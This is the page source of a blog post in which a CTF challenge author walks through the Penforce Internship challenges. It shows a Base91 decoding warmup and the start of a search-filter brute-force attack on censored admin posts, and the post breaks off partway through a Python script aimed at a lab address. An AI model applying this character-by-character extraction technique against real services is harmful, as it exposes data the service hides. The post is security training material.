<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Penforce CTF" />
<meta property="og:locale" content="en" />
<meta name="description" content="In this post, I’m going to share four challenges I created for the Penforce Internship CTF Competition. The goal of these challenges was to give participants hands-on experience with different security concepts, ranging from web vulnerabilities to tricky bypass techniques. Each challenge was designed not only to test problem-solving skills but also to highlight real-world attack surfaces that security professionals often encounter." />
<meta property="og:description" content="In this post, I’m going to share four challenges I created for the Penforce Internship CTF Competition. The goal of these challenges was to give participants hands-on experience with different security concepts, ranging from web vulnerabilities to tricky bypass techniques. Each challenge was designed not only to test problem-solving skills but also to highlight real-world attack surfaces that security professionals often encounter." />
<link rel="canonical" href="http://localhost:4000/posts/Penforce/" />
<meta property="og:url" content="http://localhost:4000/posts/Penforce/" />
<meta property="og:site_name" content="Hell’s Executioner" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-09-12T03:00:00+03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Penforce CTF" />
<meta name="twitter:site" content="@Abo_Elnasr101" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-10-26T22:55:36+03:00","datePublished":"2025-09-12T03:00:00+03:00","description":"In this post, I’m going to share four challenges I created for the Penforce Internship CTF Competition. The goal of these challenges was to give participants hands-on experience with different security concepts, ranging from web vulnerabilities to tricky bypass techniques. Each challenge was designed not only to test problem-solving skills but also to highlight real-world attack surfaces that security professionals often encounter.","headline":"Penforce CTF","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/Penforce/"},"url":"http://localhost:4000/posts/Penforce/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Penforce CTF | Hell’s Executioner
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Hell’s Executioner">
<meta name="application-name" content="Hell’s Executioner">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/mem.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Hell’s Executioner</a>
    <p class="site-subtitle fst-italic mb-0">Red teaming with a devilish touch.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
   
      

      
        <a
          href="https://github.com/MohamedAboElnasr"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
   
      

      
        <a
          href="https://twitter.com/Abo_Elnasr101"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
   
      

      
        <a
          href="https://www.linkedin.com/in/abo-elnasr"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
   
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['ggta8080','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
   
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>Penforce CTF</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->


 





<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Penforce CTF</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1757635200"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Sep 12, 2025
</time>

      </span>

      <!-- lastmod date -->
      
      <span>
        Updated <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1761508536"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Oct 26, 2025
</time>

      </span>
       

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
           By

          <em>
            
            <a href="https://twitter.com/Abo_Elnasr101">Aboelnasr</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1268 words"
>
  <em>7 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
  <div
    id="toc-bar"
    class="d-flex align-items-center justify-content-between invisible"
  >
    <span class="label text-truncate">Penforce CTF</span>
    <button type="button" class="toc-trigger btn me-1">
      <i class="fa-solid fa-list-ul fa-fw"></i>
    </button>
  </div>

  <button
    id="toc-solo-trigger"
    type="button"
    class="toc-trigger btn btn-outline-secondary btn-sm"
  >
    <span class="label ps-2 pe-1"
      >Contents</span
    >
    <i class="fa-solid fa-angle-right fa-fw"></i>
  </button>

  <dialog id="toc-popup" class="p-0">
    <div
      class="header d-flex flex-row align-items-center justify-content-between"
    >
      <div class="label text-truncate py-2 ms-4">Penforce CTF</div>
      <button
        id="toc-popup-close"
        type="button"
        class="btn mx-1 my-1 opacity-75"
      >
        <i class="fas fa-close"></i>
      </button>
    </div>
    <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
  </dialog>
  

  <div class="content"><p>In this post, I’m going to share four challenges I created for the Penforce Internship CTF Competition. The goal of these challenges was to give participants hands-on experience with different security concepts, ranging from web vulnerabilities to tricky bypass techniques. Each challenge was designed not only to test problem-solving skills but also to highlight real-world attack surfaces that security professionals often encounter.</p>

<p>Throughout this write-up, I’ll walk through the challenges step by step, explain the thought process behind their design, and share how they can be solved. Whether you’re new to CTFs or already familiar with them, I hope this breakdown gives you both insight and inspiration for creating or solving your own challenges.</p>

<p><a href="/assets/images/penforce/penforce-admin.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/penforce-admin.png" alt="" loading="lazy"></a></p>

<hr />

<h3 id="base-instincts"><span class="me-2">Base Instincts</span><a href="#base-instincts" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p><a href="/assets/images/penforce/Base.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Base.png" alt="Base Instincts" loading="lazy"></a></p>

<p>that was a just warmup challenge, anyway let’s start solving it
we start by landing to a page for registration
<a href="/assets/images/penforce/base-register.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/base-register.png" alt="" loading="lazy"></a></p>

<p>after signingup and login we see another page to access the something called secret</p>

<p><a href="/assets/images/penforce/base-secret.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/base-secret.png" alt="" loading="lazy"></a></p>

<p>after that we access anthoer page that has like a some random string in it, it looks encoded or encrypted we don’t know yet but seeing the endpoint name it’s called /hidden-page-91 very strigt forward</p>

<p><a href="/assets/images/penforce/base-secret2.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/base-secret2.png" alt="" loading="lazy"></a>
by knowing the challenge name and the number in <code class="language-plaintext highlighter-rouge">hidden-page-91</code> let’s search for base91 and try to decode it using that algorithem</p>

<p><a href="/assets/images/penforce/base-sol.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/base-sol.png" alt="" loading="lazy"></a></p>

<p>and that was the soltion for this challange.</p>

<hr />

<h3 id="bru7efeed"><span class="me-2">Bru7eFeed</span><a href="#bru7efeed" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p><a href="/assets/images/penforce/Bru7eFeed.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>this was a simple and a fun challenge it required some scripting and bruteforcing
we sart by landing in a login page
<a href="/assets/images/penforce/Bru7eFeed-login.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-login.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>and a welcome page
<a href="/assets/images/penforce/Bru7eFeed-viewposts.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-viewposts.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>after that we some posts from different users and a filter search that takes a 3 char and return anypost that has those 3 charachters
<a href="/assets/images/penforce/Bru7eFeed-posts.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-posts.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>the source code is given in the challenge description so let’s see what’s happening there,
we have the posts in dict
<a href="/assets/images/penforce/Bru7eFeed-posts-code.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-posts-code.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>and the route that takes the 3 chars and return the posts</p>

<p><a href="/assets/images/penforce/Bru7eFeed-postsroute.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-postsroute.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>but the function censor_posts returns the admins posts in stars
<a href="/assets/images/penforce/Bru7eFeed-postsstars.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-postsstars.png" alt="Bru7eFeed" loading="lazy"></a></p>

<p>Knowing the flag is stored in an admin post and that the flag uses a known prefix, we can brute-force it. Supply the first two known characters as a prefix and fuzz the unknown third character to discover the rest. we will make a script to autoamte this.</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">requests</span>
<span class="kn">from</span> <span class="n">concurrent.futures</span> <span class="kn">import</span> <span class="n">ThreadPoolExecutor</span><span class="p">,</span> <span class="n">as_completed</span>

<span class="n">url</span> <span class="o">=</span> <span class="sh">"</span><span class="s">http://192.168.1.9:4001/posts</span><span class="sh">"</span>
<span class="n">cookies</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">session</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">eyJ1c2VyIjoibWVtIn0.aMHTJA.gFCmt-LsXh5K_-gYD6fO8uf9XhA</span><span class="sh">"</span><span class="p">}</span>

<span class="n">charset</span> <span class="o">=</span> <span class="sh">"</span><span class="s">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_</span><span class="sh">"</span>

